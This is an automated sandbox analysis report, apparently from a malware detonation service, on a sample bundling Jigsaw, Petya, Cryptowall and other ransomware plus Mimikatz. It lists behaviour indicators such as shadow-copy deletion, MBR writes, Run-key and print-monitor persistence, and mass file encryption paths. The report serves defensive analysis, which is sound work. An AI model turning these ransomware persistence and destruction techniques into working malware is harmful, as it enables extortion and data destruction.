Analysis Overview
SHA256
f255227fd45316c4681085f39e6da2f509af851f8cc2d2a84ea99c06b935ffe6
Threat Level: Known bad
The file bc41543926dda3762ae39e35aba7a813_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
Locky
Mimikatz
Jigsaw Ransomware
Suspicious use of NtCreateProcessExOtherParentProcess
Cerber
Renames multiple (3792) files with added filename extension
mimikatz is an open source tool to dump credentials on Windows
Renames multiple (2015) files with added filename extension
Deletes shadow copies
Contacts a large (1107) amount of remote hosts
Modifies Windows Firewall
Blocklisted process makes network request
Contacts a large (1095) amount of remote hosts
Boot or Logon Autostart Execution: Port Monitors
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Executes dropped EXE
Drops startup file
Reads user/profile data of web browsers
Loads dropped DLL
UPX packed file
Deletes itself
Drops desktop.ini file(s)
Adds Run key to start application
Writes to the Master Boot Record (MBR)
Looks up external IP address via web service
Suspicious use of SetThreadContext
Sets desktop wallpaper using registry
Drops file in System32 directory
Drops file in Windows directory
Drops file in Program Files directory
Event Triggered Execution: Netsh Helper DLL
Enumerates physical storage devices
Command and Scripting Interpreter: JavaScript
Program crash
Unsigned PE
Office loads VBA resources, possible macro or embedded object present
Modifies registry class
Checks processor information in registry
Opens file in notepad (likely ransom note)
Checks SCSI registry key(s)
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: MapViewOfSection
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Modifies data under HKEY_USERS
Enumerates system info in registry
Suspicious use of SendNotifyMessage
Kills process with taskkill
Interacts with shadow copies
Suspicious use of AdjustPrivilegeToken
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies Internet Explorer settings
Uses Volume Shadow Copy service COM API
Runs ping.exe
Suspicious use of WriteProcessMemory
Suspicious use of UnmapMainImage
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-30 01:00
Signatures
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral10
Detonation Overview
Submitted
2024-06-30 00:59
Reported
2024-06-30 01:30
Platform
win10v2004-20240508-en
Max time kernel
1679s
Max time network
1694s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Mamba\131.exe
"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Mamba\131.exe"
Network
Files
Analysis: behavioral25
Detonation Overview
Submitted
2024-06-30 00:59
Reported
2024-06-30 01:30
Platform
win7-20240508-en
Max time kernel
0s
Max time network
1s
Command Line
Signatures
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739.exe
"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739.exe"
Network
Files
memory/1728-1-0x0000000000400000-0x000000000043F000-memory.dmp
memory/1728-0-0x000000000041A000-0x0000000000427000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-30 00:59
Reported
2024-06-30 01:30
Platform
win10v2004-20240611-en
Max time kernel
1385s
Max time network
1178s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: 33 | N/A | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe
"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1628 -ip 1628
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1628 -s 476
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.246.116.51.in-addr.arpa | udp |
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-06-30 00:59
Reported
2024-06-30 01:30
Platform
win10v2004-20240611-en
Max time kernel
1354s
Max time network
1178s
Command Line
Signatures
Jigsaw Ransomware
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2884 created 3428 | N/A | C:\Windows\system32\taskmgr.exe | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe |
| PID 2884 created 3428 | N/A | C:\Windows\system32\taskmgr.exe | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe |
| PID 2884 created 1768 | N/A | C:\Windows\system32\taskmgr.exe | C:\Program Files\Google\Chrome\Application\chrome.exe |
| PID 2884 created 1768 | N/A | C:\Windows\system32\taskmgr.exe | C:\Program Files\Google\Chrome\Application\chrome.exe |
Renames multiple (3792) files with added filename extension
Boot or Logon Autostart Execution: Port Monitors
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\USB Monitor | C:\Windows\System32\spoolsv.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\WSD Port | C:\Windows\System32\spoolsv.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\WSD Port\Ports | C:\Windows\System32\spoolsv.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\WSD Port\Adapters\IPP | C:\Windows\System32\spoolsv.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\WSD Port\Adapters\WSPrint | C:\Windows\System32\spoolsv.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Appmon | C:\Windows\System32\spoolsv.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Appmon\Ports | C:\Windows\System32\spoolsv.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Microsoft Shared Fax Monitor | C:\Windows\System32\spoolsv.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\WSD Port\Adapters\WSPrint\OfflinePorts | C:\Windows\System32\spoolsv.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Local Port | C:\Windows\System32\spoolsv.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Standard TCP/IP Port | C:\Windows\System32\spoolsv.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Standard TCP/IP Port\Ports | C:\Windows\System32\spoolsv.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-30.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Win10\Classic\FreeCell.Medium.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fr-fr\ui-strings.js.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pl-pl\ui-strings.js.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\WideTile.scale-200.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\ExchangeSmallTile.scale-125.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Images\PrintAndShare\Glyph_0xe7d1.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\da-dk\ui-strings.js.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\base_kor.xml | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-black_scale-80.png.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-48_altform-unplated_contrast-white.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ja-jp\ui-strings.js | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderLargeTile.contrast-black_scale-100.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxAccountsStoreLogo.scale-100.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ipsfin.xml | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailLargeTile.scale-200.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-96_altform-colorize.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\Weather_LogoSmall.scale-100.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\plugin.js | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\hu-hu\ui-strings.js.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\StoreLogo.scale-125.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\CardUIBkg.scale-400.HCWhite.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-black\MixedRealityPortalSplashScreen.scale-100_contrast-black.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluDCFilesEmpty_180x180.svg | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vreg\word.x-none.msi.16.x-none.vreg.dat | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_x64__8wekyb3d8bbwe\Assets\tinytile.targetsize-256_altform-unplated_contrast-black.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\StoreLargeTile.scale-100.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-tw\ui-strings.js.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteSectionGroupSmallTile.scale-400.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraSmallTile.scale-100.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\GenericMailLargeTile.scale-125.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-80_contrast-black.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Lighting\Light\Default.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Wallet_2.4.18324.0_x64__8wekyb3d8bbwe\images\PaySplashScreen.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteAppList.targetsize-20_altform-unplated.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSectionMedTile.scale-150.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-40_altform-lightunplated.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\423x173\13.jpg | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\lv_get.svg | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\AddressBook.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\Scientific.targetsize-32_contrast-white.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSectionGroupSmallTile.scale-125.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\192.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Delete.White.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\ExploreButtonGradientTenfoot.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\faf-main.js.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ui-strings.js.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\back-arrow-down.svg.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_x64__8wekyb3d8bbwe\Assets\tinytile.targetsize-256_contrast-black.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-white\PeopleAppList.targetsize-60_altform-lightunplated.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Yahoo-Dark.scale-150.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_int.gif | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-36_altform-unplated_contrast-black.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\Retail\NinjaCatOnDragon.scale-100.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\SmallTile.scale-100_contrast-black.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNotePageWideTile.scale-150.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hu-hu\ui-strings.js.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\eu-es\ui-strings.js.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\en-us\onenote_whatsnew.xml | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fi-fi\ui-strings.js | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Integration\C2RManifest.shared.Office.x-none.msi.16.x-none.xml | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\bwclassic.dotx | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_tr_135x40.svg | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-si\ui-strings.js | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | C:\Windows\System32\spoolsv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0002 | C:\Windows\System32\spoolsv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | C:\Windows\System32\spoolsv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | C:\Windows\System32\spoolsv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0002 | C:\Windows\System32\spoolsv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID | C:\Windows\System32\spoolsv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | C:\Windows\System32\spoolsv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\System32\spoolsv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0002 | C:\Windows\System32\spoolsv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0002 | C:\Windows\System32\spoolsv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\System32\spoolsv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\System32\spoolsv.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
